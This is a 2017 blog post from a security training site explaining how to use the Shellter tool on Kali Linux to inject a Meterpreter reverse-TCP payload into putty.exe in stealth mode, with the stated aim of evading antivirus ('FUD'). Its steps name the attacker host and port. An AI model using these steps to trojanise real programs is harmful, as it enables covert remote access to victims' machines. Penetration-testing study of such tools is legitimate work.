Home 0P3N Blog Need a FUD: What about Shellter?
Ready to Start Your Career?
Create Free Account
bytezealot s profile image
By: bytezealot
March 17, 2017

Need a FUD: What about Shellter?

By: bytezealot
March 17, 2017
bytezealot s profile image
By: bytezealot
March 17, 2017
computer-1833058_1280Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE (portable executable) infector ever created. It can be used in order to inject shellcode into native 32-bit Windows applications. It takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access (Read Write Execute Access), and whatever would look dodgy under an Anti-Virus scan.Please note that Kali Linux will be used during this demonstration.INSTALLING SHELLTER:IMPORTANT: "Wine" must be installed for shellter to properly install and run.First, use the following command to install Shellter:apt-get-install shellterUSING SHELLTER:To start using Shellter, just use the following command:shellter Here you can choose 3 options (Automatic, Manual, Help). We will use "A" for Automatic.It will then ask for the PE Target. In our case, we use /root/Desktop/putty.exe.A backup file will be made in Shellter_Backups.After,  we will choose if we want to use Stealth Mode. For the purpose of this example, we will choose "Y" for yes. We then have 7 Payloads to choose from:1. Meterpreter_reverse_TCP (stager)2. Meterpreter_Reverse_HTTP (stager)3. Meterpreter_Reverse_HTTPS (stager)4. Meterpreter_Bind_TCP (stager)5. Shell_Reverse_TCP (stager)6. Shell_Bind_TCP (stager)7. WinExecIf we want a payload in the list, we enter "L" for list.Then, we enter the numer of the payload to use. In this example, we will use "1" for Meterpreter_reverse_TCP.After, we are asked to provide the following information:LHOST: "192.168.1.7" (in my case)LPORT: "443" Standard HTTP over SSL port.We then will wait for a few seconds for the process to complete, and Voila, we have an injected payload into a regula program!There is a lot more to know about Shellter, and you can easily find more features and take it much further! Have fun playing with this incredible tool!PS: Shellter Pro is on the verge of coming out so I encourage you to periodically check it out.Best Regards!
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry